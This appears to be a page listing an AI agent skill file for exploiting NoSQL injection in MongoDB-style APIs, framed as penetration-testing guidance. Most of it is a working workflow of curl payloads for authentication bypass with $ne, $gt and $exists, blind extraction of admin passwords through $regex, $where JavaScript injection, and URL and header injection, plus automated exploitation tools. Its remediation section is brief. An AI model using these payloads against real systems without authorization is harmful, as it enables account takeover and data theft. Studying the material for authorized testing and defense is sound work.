ReddRadar
Agent skill
exploiting-nosql-injection-vulnerabilities
Detect and exploit NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate authentication bypass, data extraction, and unauthorized access risks.
Install this agent skill to your Project
npx add-skill https://github.com/autohandai/community-skills/tree/main/exploiting-nosql-injection-vulnerabilities
SKILL.md
Exploiting NoSQL Injection Vulnerabilities
When to Use
- During web application penetration testing of applications using NoSQL databases
- When testing authentication mechanisms backed by MongoDB or similar databases
- When assessing APIs that accept JSON input for database queries
- During bug bounty hunting on applications with NoSQL backends
- When performing security code review of database query construction
Prerequisites
- Burp Suite Professional or Community Edition with JSON support
- NoSQLMap tool installed (
pip install nosqlmapor from GitHub) - Understanding of MongoDB query operators ($ne, $gt, $regex, $where, $exists)
- Target application using a NoSQL database (MongoDB, CouchDB, Cassandra)
- Proxy configured for HTTP traffic interception
- Python 3.x for custom payload scripting
Workflow
Step 1 — Identify NoSQL Injection Points
# Look for JSON-based login forms or API endpoints
# Common indicators: application accepts JSON POST bodies, uses MongoDB
# Test with basic syntax-breaking characters
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": "admin\"", "password": "test"}'
# Test for operator injection in query parameters
curl "http://target.com/api/users?username[$ne]=invalid"
# Check for error-based detection
curl -X POST http://target.com/api/search \
-H "Content-Type: application/json" \
-d '{"query": {"$gt": ""}}'
Step 2 — Perform Authentication Bypass
# Basic authentication bypass with $ne operator
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}}'
# Bypass with $gt operator
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'
# Target specific user with regex
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": "admin", "password": {"$regex": ".*"}}'
# Bypass using $exists operator
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$exists": true}, "password": {"$exists": true}}'
Step 3 — Extract Data Using Boolean-Based Blind Injection
# Extract username character by character using $regex
# Test if first character of admin password is 'a'
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": "admin", "password": {"$regex": "^a"}}'
# Test if first two characters are 'ab'
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": "admin", "password": {"$regex": "^ab"}}'
# Enumerate usernames with regex
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$regex": "^adm"}, "password": {"$ne": "invalid"}}'
Step 4 — Exploit JavaScript Injection via $where
# JavaScript injection through $where operator
curl -X POST http://target.com/api/search \
-H "Content-Type: application/json" \
-d '{"$where": "this.username == \"admin\""}'
# Time-based detection with sleep
curl -X POST http://target.com/api/search \
-H "Content-Type: application/json" \
-d '{"$where": "sleep(5000) || this.username == \"admin\""}'
# Data exfiltration via $where with string comparison
curl -X POST http://target.com/api/search \
-H "Content-Type: application/json" \
-d '{"$where": "this.password.match(/^a/) != null"}'
Step 5 — Use NoSQLMap for Automated Testing
# Clone and setup NoSQLMap
git clone https://github.com/codingo/NoSQLMap.git
cd NoSQLMap
python setup.py install
# Run NoSQLMap against target
python nosqlmap.py -u http://target.com/api/login \
--method POST \
--data '{"username":"test","password":"test"}'
# Alternative: use nosqli scanner
pip install nosqli
nosqli scan -t http://target.com/api/login -d '{"username":"*","password":"*"}'
Step 6 — Test URL Parameter Injection
# Parameter-based injection (GET requests)
curl "http://target.com/api/users?username[$ne]=&password[$ne]="
curl "http://target.com/api/users?username[$regex]=admin&password[$gt]="
curl "http://target.com/api/users?username[$exists]=true"
# Array injection via URL parameters
curl "http://target.com/api/users?username[$in][]=admin&username[$in][]=root"
# Inject via HTTP headers if processed by backend
curl http://target.com/api/profile \
-H "X-User-Id: {'\$ne': null}"
Key Concepts
| Concept | Description |
|---|---|
| Operator Injection | Injecting MongoDB operators ($ne, $gt, $regex) into query parameters |
| Authentication Bypass | Using operators to match any document and bypass login checks |
| Blind Extraction | Character-by-character data extraction using $regex boolean responses |
| $where Injection | Executing arbitrary JavaScript on the MongoDB server via $where operator |
| Type Juggling | Exploiting how NoSQL databases handle different input types (string vs object) |
| BSON Injection | Manipulating Binary JSON serialization in MongoDB wire protocol |
| Server-Side JS | JavaScript execution context available in MongoDB for query evaluation |
Tools & Systems
| Tool | Purpose |
|---|---|
| NoSQLMap | Automated NoSQL injection detection and exploitation framework |
| Burp Suite | HTTP proxy for intercepting and modifying JSON requests |
| MongoDB Shell | Direct database interaction for testing query behavior |
| nosqli | Dedicated NoSQL injection scanner and exploitation tool |
| PayloadsAllTheThings | Curated NoSQL injection payload repository |
| Nuclei | Template-based scanner with NoSQL injection detection templates |
| Postman | API testing platform for crafting NoSQL injection requests |
Common Scenarios
- Login Bypass — Bypass MongoDB-backed authentication using
{"$ne": ""}operator injection in username and password fields - Data Enumeration — Extract database contents character by character using
$regexblind injection when no direct output is visible - Privilege Escalation — Modify user role fields through NoSQL injection in profile update endpoints
- API Key Extraction — Extract API keys or tokens stored in MongoDB collections through boolean-based blind techniques
- Account Takeover — Enumerate valid usernames via regex injection then brute-force passwords through operator-based authentication bypass
Output Format
## NoSQL Injection Assessment Report
- **Target**: http://target.com/api/login
- **Database**: MongoDB 6.0
- **Vulnerability Type**: Operator Injection (Authentication Bypass)
- **Severity**: Critical (CVSS 9.8)
### Vulnerable Parameters
| Endpoint | Parameter | Injection Type | Impact |
|----------|-----------|---------------|--------|
| POST /api/login | username | Operator ($ne) | Auth Bypass |
| POST /api/login | password | Regex ($regex) | Data Extraction |
| GET /api/users | id | $where JS Injection | RCE Potential |
### Proof of Concept
- Authentication bypass achieved with: {"username":{"$ne":""},"password":{"$ne":""}}
- Extracted 3 admin passwords via blind regex injection
- JavaScript execution confirmed via $where operator
### Remediation
- Use parameterized queries with MongoDB driver sanitization
- Implement input type validation (reject objects where strings expected)
- Disable server-side JavaScript execution ($where) in MongoDB config
- Apply least-privilege database access controls
Recommended Agent Skills
Expand your agent's capabilities with these related and highly-rated skills.
autohandai/community-skills
mapping-mitre-attack-techniques
Maps observed adversary behaviors, security alerts, and detection rules to MITRE ATT&CK techniques and sub-techniques to quantify detection coverage and guide control prioritization. Use when building an ATT&CK-based coverage heatmap, tagging SIEM alerts with technique IDs, aligning security controls to adversary playbooks, or reporting threat exposure to executives. Activates for requests involving ATT&CK Navigator, Sigma rules, MITRE D3FEND, or coverage gap analysis.
autohandai/community-skills
hunting-for-spearphishing-indicators
Hunt for spearphishing campaign indicators across email logs, endpoint telemetry, and network data to detect targeted email attacks.
autohandai/community-skills
analyzing-malicious-url-with-urlscan
URLScan.io is a free service for scanning and analyzing suspicious URLs. It captures screenshots, DOM content, HTTP transactions, JavaScript behavior, and network connections of web pages in an isolat
autohandai/community-skills
implementing-zero-standing-privilege-with-cyberark
Deploy CyberArk Secure Cloud Access to eliminate standing privileges in hybrid and multi-cloud environments using just-in-time access with time, entitlement, and approval controls.
autohandai/community-skills
implementing-pam-for-database-access
Deploy privileged access management for database systems including Oracle, SQL Server, PostgreSQL, and MySQL. Covers session proxy configuration, credential vaulting, query auditing, dynamic credentia
autohandai/community-skills
detecting-t1003-credential-dumping-with-edr
Detect OS credential dumping techniques targeting LSASS memory, SAM database, NTDS.dit, and cached credentials using EDR telemetry, Sysmon process access monitoring, and Windows security event correlation.
Didn't find tool you were looking for?